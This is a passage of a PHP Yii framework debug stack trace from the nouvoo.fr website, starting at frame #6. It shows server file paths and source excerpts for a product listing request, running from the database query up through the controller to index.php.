/home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/framework/db/ar/CActiveRecord.php(1470): CActiveRecord-> query(CDbCriteria, true)
1465 */
1466 public function findAll($condition='',$params=array())
1467 {
1468 Yii::trace(get_class($this).'.findAll()','system.db.ar.CActiveRecord');
1469 $criteria=$this->getCommandBuilder()->createCriteria($condition,$params);
1470 return $this->query($criteria,true);
1471 }
1472
1473 /**
1474 * Finds a single active record with the specified primary key.
1475 * See {@link find()} for detailed explanation about $condition and $params.
|
#6 |
+
–
/home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/framework/web/CActiveDataProvider.php(199): CActiveRecord-> findAll(CDbCriteria)
194 $this->model->setDbCriteria($criteria);
195 $sort->applyOrder($criteria);
196 }
197
198 $this->model->setDbCriteria($baseCriteria!==null ? clone $baseCriteria : null);
199 $data=$this->model->findAll($criteria);
200 $this->model->setDbCriteria($baseCriteria); // restore original criteria
201 return $data;
202 }
203
204 /**
|
#7 |
+
–
/home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/framework/web/CDataProvider.php(168): CActiveDataProvider-> fetchData()
163 * @return array the list of data items currently available in this data provider.
164 */
165 public function getData($refresh=false)
166 {
167 if($this->_data===null || $refresh)
168 $this->_data=$this->fetchData();
169 return $this->_data;
170 }
171
172 /**
173 * Sets the data items for this provider.
|
#8 |
+
–
/home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/protected/models/Product.php(757): CDataProvider-> getData()
752 $options['offset']=0;
753 $options['limit']=$limit;
754 // print_r($options);
755 // exit;
756 $dataProvider=Product::getDataProvider($options,$order,$ignore_search);
757 $array=$dataProvider->getData();
758
759 shuffle($array);
760
761 return $array;
762 }
|
#9 |
+
–
/home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/protected/controllers/ListingController.php(166): Product:: getMostRecentItems(array("category_id" => "282"))
161 'title' => '',
162 'items' => array($pub),
163 );
164
165 // Most recent
166 $items=Product::getMostRecentItems(array('category_id'=>isset($model->category->parent)?$model->category->parent_id:$model->category_id));
167 $sidebarBlocs[]=array(
168 'name' => AP_BLOC_PATH.'_featured_list',
169 'title' => mt_rand(0,1)?Yii::t('app','Nouveautés'):Yii::t('app','Notre sélection'),
170 'items' => $items,
171 );
|
#10 |
unknown(0): ListingController->actionView("26237")
|
#11 |
+
–
/home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/framework/web/actions/CAction.php(108): ReflectionMethod-> invokeArgs(ListingController, array("26237"))
103 elseif($param->isDefaultValueAvailable())
104 $ps[]=$param->getDefaultValue();
105 else
106 return false;
107 }
108 $method->invokeArgs($object,$ps);
109 return true;
110 }
111 }
|
#12 |
+
–
/home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/framework/web/actions/CInlineAction.php(47): CAction-> runWithParamsInternal(ListingController, ReflectionMethod, array("id" => "26237", "name" => "association-energie-et-arkanes"))
42 {
43 $methodName='action'.$this->getId();
44 $controller=$this->getController();
45 $method=new ReflectionMethod($controller, $methodName);
46 if($method->getNumberOfParameters()>0)
47 return $this->runWithParamsInternal($controller, $method, $params);
48 else
49 return $controller->$methodName();
50 }
51
52 }
|
#13 |
+
–
/home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/framework/web/CController.php(308): CInlineAction-> runWithParams(array("id" => "26237", "name" => "association-energie-et-arkanes"))
303 {
304 $priorAction=$this->_action;
305 $this->_action=$action;
306 if($this->beforeAction($action))
307 {
308 if($action->runWithParams($this->getActionParams())===false)
309 $this->invalidActionParams($action);
310 else
311 $this->afterAction($action);
312 }
313 $this->_action=$priorAction;
|
#14 |
+
–
/home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/framework/web/filters/CFilterChain.php(133): CController-> runAction(CInlineAction)
128 $filter=$this->itemAt($this->filterIndex++);
129 Yii::trace('Running filter '.($filter instanceof CInlineFilter ? get_class($this->controller).'.filter'.$filter->name.'()':get_class($filter).'.filter()'),'system.web.filters.CFilterChain');
130 $filter->filter($this);
131 }
132 else
133 $this->controller->runAction($this->action);
134 }
135 } |
#15 |
+
–
/home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/framework/web/CController.php(291): CFilterChain-> run()
286 $this->runAction($action);
287 else
288 {
289 $priorAction=$this->_action;
290 $this->_action=$action;
291 CFilterChain::create($this,$action,$filters)->run();
292 $this->_action=$priorAction;
293 }
294 }
295
296 /**
|
#16 |
+
–
/home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/framework/web/CController.php(265): CController-> runActionWithFilters(CInlineAction, array(array(0 => "COutputCache + index", "duration" => 7200, "varyByParam" => array("module_id"))))
260 {
261 if(($parent=$this->getModule())===null)
262 $parent=Yii::app();
263 if($parent->beforeControllerAction($this,$action))
264 {
265 $this->runActionWithFilters($action,$this->filters());
266 $parent->afterControllerAction($this,$action);
267 }
268 }
269 else
270 $this->missingAction($actionID);
|
#17 |
+
–
/home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/framework/web/CWebApplication.php(282): CController-> run("view")
277 {
278 list($controller,$actionID)=$ca;
279 $oldController=$this->_controller;
280 $this->_controller=$controller;
281 $controller->init();
282 $controller->run($actionID);
283 $this->_controller=$oldController;
284 }
285 else
286 throw new CHttpException(404,Yii::t('yii','Unable to resolve the request "{route}".',
287 array('{route}'=>$route===''?$this->defaultController:$route)));
|
#18 |
+
–
/home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/framework/web/CWebApplication.php(141): CWebApplication-> runController("listing/view")
136 foreach(array_splice($this->catchAllRequest,1) as $name=>$value)
137 $_GET[$name]=$value;
138 }
139 else
140 $route=$this->getUrlManager()->parseUrl($this->getRequest());
141 $this->runController($route);
142 }
143
144 /**
145 * Registers the core application components.
146 * This method overrides the parent implementation by registering additional core components.
|
#19 |
+
–
/home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/framework/base/CApplication.php(180): CWebApplication-> processRequest()
175 public function run()
176 {
177 if($this->hasEventHandler('onBeginRequest'))
178 $this->onBeginRequest(new CEvent($this));
179 register_shutdown_function(array($this,'end'),0,false);
180 $this->processRequest();
181 if($this->hasEventHandler('onEndRequest'))
182 $this->onEndRequest(new CEvent($this));
183 }
184
185 /**
|
#20 |
+
–
/home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/index.php(58): CApplication-> run()
53 // header("Location: http://pro.".AP_DOMAIN_NAME."/".$url);
54 // exit;
55 // }
56
57 require_once($yii);
58 Yii::createWebApplication($config)->run();
|